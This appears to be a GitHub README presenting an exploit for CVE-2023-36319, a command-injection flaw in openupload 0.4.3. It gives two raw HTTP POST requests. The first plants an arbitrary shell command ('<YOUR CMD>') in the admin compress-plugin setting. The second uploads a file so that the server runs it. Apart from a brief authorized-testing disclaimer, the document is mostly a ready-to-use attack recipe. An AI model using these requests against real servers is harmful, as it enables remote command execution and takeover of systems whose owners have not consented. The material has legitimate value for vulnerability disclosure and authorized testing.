CVE-2023-36319: GitHub - Lowalu/CVE-2023-36319: exp4CVE-2023-36319

CVE-2023-36319

By modifying the compression plug-in command, the attacker can cause the server to execute arbitrary commands during the upload process.

Only used for authorized security testing, please do not use it for illegal purposes. Violations have nothing to do with the author.

Affected version:

openupload Stable version 0.4.3

Step one

Log in to the backend and click on the function: Administration ->Plugins ->compress

Add new “command” directive and save:

POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 183
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

action=adminpluginsoptions&step=4&id=compress&gid=admins&command=<YOUR CMD>&extension=&compression=

Step two

Enter the “File upload” function, upload a random file, and ensure “compress=0” in the parameters.

POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 53
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

action=u&step=3&description=123&emailme=no&compress=0

The commands we write will be executed normally.